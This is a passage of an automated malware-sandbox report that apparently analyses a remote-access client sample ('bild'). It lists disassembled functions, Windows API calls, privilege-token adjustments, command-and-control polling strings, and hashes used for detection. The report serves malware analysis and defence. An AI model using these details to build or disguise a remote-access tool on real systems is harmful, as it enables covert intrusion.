                                                                                                      • Instruction Fuzzy Hash: D3312975E00208AFDB10DFB8EA4CB8E73F4EF54324F408569E908D7A40EB319A658791
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?,?,?,9386354D,8A67EDB3,938634B3,FFFFFFFF,00000000), ref: 6C7631E2
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C78ECB0), ref: 6C7631EC
                                                                                                      • GetSystemTime.KERNEL32(?,8A67EDB3,938634B3,FFFFFFFF,00000000), ref: 6C76322A
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C78ECB0), ref: 6C763234
                                                                                                      • EnterCriticalSection.KERNEL32(6C79B898,?,9386354D), ref: 6C7632BE
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C7632D3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C76334D
                                                                                                        • Part of subcall function 6C76BA20: __strdup.LIBCMT ref: 6C76BA3A
                                                                                                        • Part of subcall function 6C76BB00: _free.LIBCMT ref: 6C76BB2D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                      • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                      • API String ID: 1510130979-3441452530
                                                                                                      • Opcode ID: 7052efb9cf87323f3286bd3eca739b36d91161f4b2d2a3aca2505dfbe9930726
                                                                                                      • Instruction ID: 1b04e5741c7b63e8725f62eb84925938943b2924e75708c6f92ea90abc020eab
                                                                                                      • Opcode Fuzzy Hash: 7052efb9cf87323f3286bd3eca739b36d91161f4b2d2a3aca2505dfbe9930726
                                                                                                      • Instruction Fuzzy Hash: EC617672D10208AFCB14DFA5D988EEEB7B9FF49304F14852DE916A7B40DB34A508CB61
                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                                      • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                                      • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                                      • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                      • String ID: SHELL32.DLL$SHGetSettings
                                                                                                      • API String ID: 4195908086-2348320231
                                                                                                      • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                      • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                                      • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                      • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset
                                                                                                      • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                      • API String ID: 2102423945-35127696
                                                                                                      • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                      • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                                      • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                      • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID: Client32$NSMWClass$NSMWClass
                                                                                                      • API String ID: 3192549508-611217420
                                                                                                      • Opcode ID: e29b56f4a67aa672c9c3122cce21b876c4d1529a7a373f118b029bff64f70a14
                                                                                                      • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                                      • Opcode Fuzzy Hash: e29b56f4a67aa672c9c3122cce21b876c4d1529a7a373f118b029bff64f70a14
                                                                                                      • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                                      APIs
                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,0075DE90,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                      • EqualSid.ADVAPI32(?,0075DE90,?,00000001,00000001), ref: 1109E9A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationToken$AllocateEqualInitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1878589025-0
                                                                                                      • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                      • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                                      • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                      • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4764EAAA,00080000,00000000,00000000), ref: 1109D46D
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 2349140579-0
                                                                                                      • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                      • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                                      • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                      • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                                      APIs
                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                                      • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 81990902-0
                                                                                                      • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                      • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                                      • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                      • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                                      • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                                      • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                                        • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                                      • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                                      • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                                      • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                                      • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                                        • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                                        • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                                      • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                                      • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                                      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                                      • SetWindowPos.USER32(00020456,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                                      • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                                      • wsprintfA.USER32 ref: 1102FFA5
                                                                                                      • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,4764EAAA,00000002,74DF2EE0), ref: 1112820A
                                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                                        • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                                      • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$849224$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                      • API String ID: 1099283604-4202555464
